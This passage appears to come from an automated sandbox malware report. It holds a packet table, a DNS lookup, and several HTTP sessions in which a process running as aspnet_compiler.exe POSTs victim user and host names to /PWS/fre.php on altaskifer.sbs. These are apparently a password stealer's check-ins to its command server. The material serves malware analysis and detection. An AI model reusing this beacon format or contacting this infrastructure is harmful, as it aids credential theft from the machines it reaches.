                                                Apr 6, 2024 09:31:08.281232119 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.281388998 CEST8049851172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:08.281449080 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.405988932 CEST8049851172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:08.422049046 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.545578003 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:08.545708895 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.547894955 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.671220064 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:08.671363115 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.794739008 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.051033020 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.051101923 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.051165104 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.051207066 CEST4985280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.174757957 CEST8049852172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.190874100 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.314644098 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.314734936 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.316932917 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.441365004 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.441440105 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.565128088 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.810904026 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.811003923 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.811098099 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.811135054 CEST4985380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:09.935069084 CEST8049853172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:09.953478098 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.077702999 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.077786922 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.080333948 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.204615116 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.204709053 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.328926086 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.572736979 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.572854042 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.572921991 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.572963953 CEST4985580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.697182894 CEST8049855172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.720809937 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.844326973 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.844449043 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.846749067 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:10.970211029 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:10.970324039 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.095063925 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.336899042 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.336993933 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.337014914 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.337050915 CEST4985680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.460335016 CEST8049856172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.483630896 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.607753038 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.608000994 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.610579014 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.734386921 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:11.734463930 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:11.858485937 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.097577095 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.097765923 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.098299026 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.098355055 CEST4985780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.221642971 CEST8049857172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.231170893 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.354954004 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.355035067 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.357167959 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.481870890 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.481923103 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.605817080 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.864523888 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.864640951 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.864656925 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.864702940 CEST4985880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:12.988382101 CEST8049858172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:12.991122007 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.115551949 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.115694046 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.117985964 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.241977930 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.242110014 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.365911961 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.639862061 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.640064955 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.640084982 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.640130997 CEST4985980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.763936043 CEST8049859172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.770855904 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.895080090 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:13.895191908 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:13.897342920 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.021444082 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.021501064 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.145649910 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.411401987 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.411427021 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.411567926 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.411611080 CEST4986080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.536746025 CEST8049860172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.537524939 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.661696911 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.661834002 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.663983107 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.788712978 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:14.788913965 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:14.914786100 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.172118902 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.172272921 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.172935009 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.173007965 CEST4986180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.296719074 CEST8049861172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.337382078 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.460771084 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.460927010 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.463120937 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.586508989 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.586615086 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.710072994 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.951977015 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.952080011 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:15.952174902 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:15.952241898 CEST4986280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:16.075745106 CEST8049862172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:17.689002991 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:17.813306093 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:17.813440084 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:17.815577030 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:17.939639091 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:17.939762115 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.063915968 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.328830004 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.328855038 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.328905106 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.328937054 CEST4986380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.453838110 CEST8049863172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.458285093 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.582995892 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.583200932 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.590588093 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.716669083 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:18.716793060 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:18.841049910 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.106915951 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.106971025 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.107047081 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.107086897 CEST4986480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.231465101 CEST8049864172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.243796110 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.368340969 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.368479013 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.370644093 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.495233059 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.495301008 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.619992971 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.871881962 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.871987104 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.873269081 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:19.873431921 CEST4986580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:19.996573925 CEST8049865172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.010437012 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.134488106 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.134614944 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.136719942 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.260982990 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.261132956 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.385191917 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.636603117 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.636758089 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.636954069 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.637003899 CEST4986680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.760694027 CEST8049866172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.780288935 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.904778004 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:20.904891968 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:20.907030106 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.031174898 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.031291008 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.155395985 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.399348974 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.399363995 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.399440050 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.399517059 CEST4986780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.523947001 CEST8049867172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.537761927 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.662792921 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.662919998 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.669303894 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.794080019 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:21.794157028 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:21.918783903 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.172482014 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.172837019 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.173028946 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.173073053 CEST4986880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.298506021 CEST8049868172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.302891970 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.426888943 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.427067041 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.429105997 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.552846909 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.552946091 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.676853895 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.932873011 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.932991982 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:22.933361053 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:22.933408022 CEST4986980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.056910038 CEST8049869172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.068109035 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.192596912 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.192729950 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.194950104 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.319602966 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.319766045 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.444433928 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.701543093 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.701685905 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.701724052 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.701776981 CEST4987080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.826260090 CEST8049870172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.834229946 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.959744930 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:23.959852934 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:23.961991072 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.086208105 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.086267948 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.210357904 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.470716000 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.470819950 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.471493006 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.471537113 CEST4987180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.595120907 CEST8049871172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.698282003 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.821892977 CEST8049872172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.822781086 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.825006962 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:24.948520899 CEST8049872172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:24.948584080 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:25.072002888 CEST8049872172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:25.328350067 CEST8049872172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:25.328521013 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:25.329231977 CEST8049872172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:25.329284906 CEST4987280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:25.452018023 CEST8049872172.67.148.126192.168.2.6
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 6, 2024 09:29:23.864559889 CEST5559753192.168.2.61.1.1.1
                                                Apr 6, 2024 09:29:24.005536079 CEST53555971.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 6, 2024 09:29:23.864559889 CEST192.168.2.61.1.1.10x7Standard query (0)altaskifer.sbsA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 6, 2024 09:29:24.005536079 CEST1.1.1.1192.168.2.60x7No error (0)altaskifer.sbs172.67.148.126A (IP address)IN (0x0001)false
                                                Apr 6, 2024 09:29:24.005536079 CEST1.1.1.1192.168.2.60x7No error (0)altaskifer.sbs104.21.39.208A (IP address)IN (0x0001)false
                                                • altaskifer.sbs
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649717172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:24.137227058 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 188
                                                Connection: close
                                                Apr 6, 2024 09:29:24.261514902 CEST188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: 'ckav.ruengineer320946ENGINEER-PCk0FDD42EE188E931437F4FBE2CQcvvj
                                                Apr 6, 2024 09:29:24.653399944 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ird%2BWHDZUtWVyC2%2FncP0yIxShO0qw3mvApHkRlJoExlp2h6OdyGyH8Y45xjU9%2FyHKXY%2BJ6UZsiXshhKDXzn8iibK47PsSNZerky5nlG9uw44paW1wpZoKbbruqes%2BSGxwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700110e4a1667ec-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649718172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:24.839757919 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 188
                                                Connection: close
                                                Apr 6, 2024 09:29:24.963792086 CEST188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: 'ckav.ruengineer320946ENGINEER-PC+0FDD42EE188E931437F4FBE2C1UaSj
                                                Apr 6, 2024 09:29:25.361860991 CEST593INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bheu0mag0aVlTdqa%2B2whCGLclexLUE8fh7vPYv5c9hpJv30kJvKijhZXHSCSTW3%2Bc9XQ3otgdN8STBr1J5y1cduUCbrylZtVdD5BZup4S2EhuAEKtzOO0LpnJwkxUby9Iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001112aa860979-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649719172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:25.556360960 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:25.685328007 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:26.063576937 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tq5XK46q7SRjYFRcPZZfGKtcPIpBiLMJK4WjuAiH%2BL6Qev21ON07KL1P%2FnuNAOOFphYcTf%2FcinjsfdXVkPhgaPs2l03ihy5KeVBd2oVOyBooPop7xmnEGjFHscBB2WOilA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011172fae7418-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649720172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:26.328738928 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:26.452619076 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:26.844019890 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
